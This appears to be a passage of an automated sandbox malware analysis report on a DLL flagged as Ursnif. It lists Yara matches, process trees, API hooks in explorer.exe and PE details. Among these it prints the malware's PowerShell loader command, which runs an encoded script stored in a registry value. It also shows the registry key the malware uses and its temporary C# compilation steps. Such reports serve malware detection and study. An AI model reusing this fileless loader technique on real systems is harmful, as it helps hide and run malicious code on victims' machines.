                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.pdb source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.pdbXP source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.pdbXP source: powershell.exe, 0000000F.00000002.1028521140.0000029E4CEFB000.00000004.00000001.sdmp
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.pdbXP source: powershell.exe, 00000011.00000002.994879898.0000026445852000.00000004.00000001.sdmp
                      Source: Binary string: c:\Baby\High\Ease\gener\side \Soon.pdb source: loaddll32.exe, 00000000.00000002.1185778870.000000006E4FF000.00000002.00020000.sdmp, data.dll
                      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.pdb source: powershell.exe, 00000011.00000002.994751964.00000264457E4000.00000004.00000001.sdmp
                      Source: data.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                      Source: data.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: data.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: data.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: data.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                      Data Obfuscation:

                      barindex
                      Suspicious powershell command line foundShow sources
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))Jump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B2263 push ecx; ret 0_2_6E4B2273
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B2210 push ecx; ret 0_2_6E4B2219
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD7AB0 push ecx; ret 0_2_00DD7AB9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00DD7E1F push ecx; ret 0_2_00DD7E2F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_04584EE0 push ecx; ret 0_2_04584EE9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_045679B6 push ss; ret 0_2_045679B7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0458528F push ecx; ret 0_2_0458529F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BC4EE0 push ecx; ret 3_2_04BC4EE9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BA79B6 push ss; ret 3_2_04BA79B7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04BC528F push ecx; ret 3_2_04BC529F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04A77AB0 push ecx; ret 5_2_04A77AB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04A77E1F push ecx; ret 5_2_04A77E2F
                      Source: C:\Windows\System32\control.exeCode function: 34_2_0093B1B5 push 3B000001h; retf 34_2_0093B1BA
                      Source: C:\Windows\System32\rundll32.exeCode function: 45_2_000002D2D67DB1B5 push 3B000001h; retf 45_2_000002D2D67DB1BA
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_009679B6 push ss; ret 49_2_009679B7
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_0098528F push ecx; ret 49_2_0098529F
                      Source: C:\Windows\SysWOW64\cmd.exeCode function: 49_2_00984EE0 push ecx; ret 49_2_00984EE9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E4B1552 LoadLibraryA,GetProcAddress,0_2_6E4B1552
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.cmdline'
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline'
                      Source: aixojixg.dll.20.drStatic PE information: real checksum: 0x0 should be: 0xee27
                      Source: keehvxm3.dll.24.drStatic PE information: real checksum: 0x0 should be: 0xeb64
                      Source: data.dllStatic PE information: real checksum: 0x75958 should be: 0x7619a
                      Source: a52acufz.dll.19.drStatic PE information: real checksum: 0x0 should be: 0x2fa8
                      Source: ddwuzigh.dll.23.drStatic PE information: real checksum: 0x0 should be: 0x5f5e
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.dllJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.dllJump to dropped file

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.883939379.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822188626.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072741613.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825298638.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820080731.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072894975.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072798456.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820057009.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820031645.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883901477.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.1184142574.000001DA4C802000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917302895.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917425679.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820138747.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000002.1074072106.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.834818320.00000000052DC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.886005688.0000000005C88000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976333462.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072599923.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072653572.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822158100.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.981565141.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883872155.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.828362336.00000000037CC000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072532170.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883811052.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822174917.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.884018260.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822140540.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072835287.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820149124.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831790686.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883955178.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883841890.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072860777.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822201439.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917192425.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820105585.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1185993315.0000027D4F702000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820124489.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000031.00000003.1072702315.00000000010F8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.917381680.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976409970.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.1188409559.000001B4FB502000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822118999.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883968959.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822095380.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.883922056.00000000049B8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.822210258.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.825513786.00000000054D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.822798516.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976255392.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.820157511.00000000039C8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.979102398.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000003.976439736.000002D2D6E3C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000003.969571267.000002BED198C000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6856, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1848, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: control.exe PID: 4868, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 3656, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 6508, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4268, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4772, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 1260, type: MEMORYSTR
                      Source: Yara matchFile source: 0.3.loaddll32.exe.3978d40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5488d40.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5488d40.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53da4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.53da4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.54594a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.38ca4a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.39494a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.38ca4a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000022.00000000.912908766.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000002.1184353403.000001B4FABB1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.973903195.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1056728839.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.971901239.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000002.977715932.000002D2D67C1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.915124168.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.960999590.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831743156.0000000005459000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000002.1186234366.0000027D4F801000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000002.1182359593.000001DA4C261000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1013485765.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.985513376.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825194509.00000000038CA000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1018879466.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.960496675.0000000006AD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1049623811.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000002.977139805.0000000000921000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.976843830.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001C.00000000.952939817.0000000006BD1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.831611672.00000000053DA000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002D.00000000.975140453.000002D2D67C0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002E.00000000.1024534203.000001B4FABB0000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000022.00000000.911103239.0000000000920000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000025.00000000.970866897.0000027D4F800000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.950497075.000000000515F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.1028966230.0000029E58B09000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000030.00000000.1045657858.000001DA4C260000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.825244038.0000000003949000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1182006594.000000000364F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.1004101775.0000026452371000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0.3.loaddll32.exe.10d8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.dd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.5d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30a94a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4f694a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.db8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.49594a0.11.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.ef8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.30a94a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.49594a0.11.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.5a8cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e4b0000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.d88cd6.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.4a70000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.4f694a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000003.775929004.0000000000DB0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.928533475.0000000004959000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1181853805.00000000030A9000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.797262385.0000000000EF0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.776223175.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.798115453.00000000010D0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000003.833489958.0000000004F69000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.786707655.0000000000D80000.00000040.00000001.sdmp, type: MEMORY
                      Hooks registry keys query functions (used to hide registry keys)Show sources
                      Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
                      Modifies the export address table of user mode modules (user mode EAT hooks)Show sources
                      Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFABB03521C
                      Modifies the prolog of user mode functions (user mode inline hooks)Show sources
                      Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
                      Modifies the import address table of user mode modules (user mode IAT hooks)Show sources
                      Source: explorer.exeEAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFABB035200
                      Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER\Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
